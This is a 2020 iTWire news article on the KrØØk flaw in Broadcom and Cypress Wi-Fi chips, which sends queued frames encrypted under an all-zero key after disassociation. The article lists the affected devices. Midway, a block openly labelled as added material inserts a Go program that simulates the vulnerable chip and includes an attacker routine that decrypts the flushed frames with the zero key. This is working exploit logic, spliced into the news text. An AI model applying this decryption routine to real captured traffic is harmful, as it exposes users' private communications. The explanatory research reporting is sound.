Thursday, 27 February 2020 08:06

ESET team finds major Wi-Fi bug in Broadcom, Cypress chips

Image by Gerd Altmann from Pixabay

Slovakian security firm ESET has discovered a vulnerability in Wi-Fi chips made by Broadcom and Cypress that causes the session encryption key to be replaced with a string of zeroes while part of a user's communications is still being encrypted.

Researchers Miloš Čermák and Robert Lipovsky said in a blog post on Wednesday that if an attacker successfully exploited this flaw, some wireless packets sent by a vulnerable device could be decrypted. The vulnerability has been given the name KrØØk.

Chips from these two companies are found in many of the most common smartphones, tablets, laptops and IoT devices. In addition, Wi-Fi access points and routers with Broadcom chips are also vulnerable.

The flaw manifests itself after a device that is connected to a Wi-Fi access point is disassociated from it; in normal operation this happens when a person moves from one access point to another or when Wi-Fi is switched off.

When this happens, the session encryption key (the temporal key, or TK) stored in the chip is cleared to zero. That in itself is normal behaviour, as no more data is expected to be transferred.

But the ESET team found that all data frames still waiting in a vulnerable chip's transmit (Tx) buffer were sent anyway, encrypted with this all-zero key.

"Since KrØØk (encryption with an all-zero TK) manifests itself following a disassociation, an adversary can exploit this by manually triggering disassociations – as opposed to the disassociations that occur naturally," the researchers said in a detailed paper about KrØØk.

"This is possible, because a disassociation can be triggered by a management data frame that’s unauthenticated and unencrypted."

An attacker within radio range could capture these data frames and subsequently decrypt them, since the key they were encrypted with is known to be all zeros; the data could contain several kilobytes of potentially sensitive information.
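The mechanism described above, end to end, as an added example that is not part of the article or of ESET's research: a Go model of CCMP (AES-CCM with an 8-byte MIC and the 802.11 nonce built from priority, transmitter address and packet number), a simulated chip whose transmit buffer is flushed after the temporal key has been zeroed on disassociation, and the attacker's only step, which is to open the captured frames with a key of sixteen zero bytes. The session key, the queued HTTP request, the transmitter MAC and the stand-in AAD are constructed; the `fixed` flag models an assumed patched behaviour (discard queued frames before the key is cleared) and is not a description of any vendor's actual firmware fix. Real frames would need the full MPDU header as AAD and the PN read from the clear-text CCMP header.

```go
package main

import (
	"crypto/aes"
	"crypto/cipher"
	"crypto/subtle"
	"fmt"
)

const micLen = 8 // CCMP is AES-CCM with an 8-byte MIC (M=8) and a 2-byte length field (L=2)

var aad = []byte("constructed stand-in for the MPDU header fields that CCMP authenticates")

func xor(a, b []byte) []byte { // a XOR b over len(a) bytes; b must be at least as long
	out := make([]byte, len(a))
	for i := range a {
		out[i] = a[i] ^ b[i]
	}
	return out
}

// ccm runs CCMP's CCM (M=8, L=2) in one pass: it CTR-transforms in and returns the MIC
// computed over aad and the plaintext (in when sealing, out when opening).
func ccm(tk []byte, nonce [13]byte, aad, in []byte, opening bool) (out, mic []byte, err error) {
	block, err := aes.NewCipher(tk)
	if err != nil {
		return nil, nil, err
	}
	ks := make([]byte, 16+len(in)) // S_0 (masks the MIC) followed by the S_1.. data keystream
	cipher.NewCTR(block, append(append([]byte{0x01}, nonce[:]...), 0, 0)).XORKeyStream(ks, ks) // A_i = flags(L-1) || nonce || counter
	out = xor(in, ks[16:])
	pt := in // the MAC covers the plaintext: the input when sealing, the CTR output when opening
	if opening {
		pt = out
	}
	// CBC-MAC over B0, the length-prefixed AAD and pt, each zero-padded to 16-byte blocks.
	mac := append(append([]byte{0x59}, nonce[:]...), byte(len(pt)>>8), byte(len(pt))) // B0: Adata=1, M=8, L=2
	block.Encrypt(mac, mac)
	aadEnc := append([]byte{byte(len(aad) >> 8), byte(len(aad))}, aad...)
	for _, part := range [][]byte{aadEnc, pt} {
		for i := 0; i < len(part); i += 16 {
			for j := i; j < len(part) && j < i+16; j++ {
				mac[j-i] ^= part[j]
			}
			block.Encrypt(mac, mac)
		}
	}
	return out, xor(mac[:micLen], ks), nil
}

// seal encrypts one MPDU body under temporal key tk, returning ciphertext || MIC.
func seal(tk []byte, nonce [13]byte, aad, pt []byte) ([]byte, error) {
	ct, mic, err := ccm(tk, nonce, aad, pt, false)
	return append(ct, mic...), err
}

// open checks the MIC on ciphertext || MIC and returns the plaintext, or an error.
func open(tk []byte, nonce [13]byte, aad, body []byte) ([]byte, error) {
	if len(body) < micLen {
		return nil, fmt.Errorf("truncated frame")
	}
	pt, mic, err := ccm(tk, nonce, aad, body[:len(body)-micLen], true)
	if err != nil || subtle.ConstantTimeCompare(mic, body[len(body)-micLen:]) != 1 {
		return nil, fmt.Errorf("MIC check failed: not encrypted under this TK (%v)", err)
	}
	return pt, nil
}

type frame struct{ nonce [13]byte; body []byte }        // sniffer's view: clear-text nonce fields, ciphertext || MIC
type chip struct{ tk []byte; pn uint64; txBuf [][]byte } // transmit path: installed TK, packet number, Tx buffer

// disassociate models the chip's reaction to a disassociation frame, genuine or forged:
// the TK is cleared and vulnerable firmware flushes queued frames under the cleared key.
func (c *chip) disassociate(fixed bool) (sent []frame) {
	if fixed { // assumed patched behaviour: drop the queue before the key is cleared
		c.txBuf = nil
	}
	c.tk = make([]byte, 16) // session key cleared in memory, i.e. set to all zeros
	for _, p := range c.txBuf {
		c.pn++
		n := [13]byte{0, 2, 0, 0, 0, 0, 1} // priority(0) || A2 (constructed MAC) || 48-bit PN
		for i := 0; i < 6; i++ {
			n[7+i] = byte(c.pn >> uint(40-8*i)) // PN big-endian, PN5 first
		}
		body, _ := seal(c.tk, n, aad, p) // cannot fail: tk is 16 bytes here
		sent = append(sent, frame{n, body})
	}
	c.txBuf = nil
	return sent
}

// krook is the attacker's step: try the all-zero TK against a captured frame.
func krook(f frame) ([]byte, error) { return open(make([]byte, 16), f.nonce, aad, f.body) }

func main() { // attacker forges a disassociation while one frame is still queued
	c := &chip{tk: []byte("constructed-TK!!"), txBuf: [][]byte{[]byte("GET /inbox?sid=42 HTTP/1.1")}}
	pt, err := krook(c.disassociate(false)[0])
	fmt.Printf("recovered with all-zero TK: %q (err=%v)\n", pt, err)
}
```

The detail worth noticing is that the MIC verifies under the zero key, so a passive sniffer does not have to guess which captured frames were flushed after the key was cleared: a frame sealed under the real TK fails the MIC check with the zero key, while a flushed one opens cleanly. The same `disassociate` call with `fixed` set to true sends nothing, which is the behaviour a firmware fix has to guarantee.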

In the blog post, Čermák and Lipovsky wrote: "Our tests confirmed that, prior to patching, some client devices by Amazon (Echo, Kindle), Apple (iPhone, iPad, MacBook), Google (Nexus), Samsung (Galaxy), Raspberry (Pi 3), Xiaomi (RedMi), as well as some access points by ASUS and Huawei, were vulnerable to KrØØk.

"This totalled to over a billion Wi-Fi-capable devices and access points, at a conservative estimate. Further, many other vendors whose products we did not test also use the affected chipsets in their devices."

Both WPA2-Personal and WPA2-Enterprise protocols, with AES-CCMP encryption, are affected, the duo said.

KrØØk is related to the KRACK flaw found by Belgian researcher Mathy Vanhoef of imec-DistriNet, KU Leuven, the ESET pair said, but it has its own distinct characteristics. "In the beginning of our research, we found KrØØk to be one of the possible causes behind the "reinstallation" of an all-zero encryption key, observed in tests for KRACK attacks," they said.

Details of the bug were released at the RSA Conference, which is being held in San Francisco this week.

Client devices tested by ESET and found vulnerable:

  • Amazon Echo 2nd gen
  • Amazon Kindle 8th gen
  • Apple iPad mini 2
  • Apple iPhone 6, 6S, 8, XR
  • Apple MacBook Air Retina 13-inch 2018
  • Google Nexus 5
  • Google Nexus 6
  • Google Nexus 6S
  • Raspberry Pi 3
  • Samsung Galaxy S4 GT-I9505
  • Samsung Galaxy S8
  • Xiaomi Redmi 3S




Sam Varghese


Sam Varghese has been writing for iTWire since 2006, a year after the site came into existence. For nearly a decade thereafter, he wrote mostly about free and open source software, based on his own use of this genre of software. Since May 2016, he has been writing across many areas of technology. He has been a journalist for nearly 40 years in India (Indian Express and Deccan Herald), the UAE (Khaleej Times) and Australia (Daily Commercial News (now defunct) and The Age). His personal blog is titled Irregular Expression.


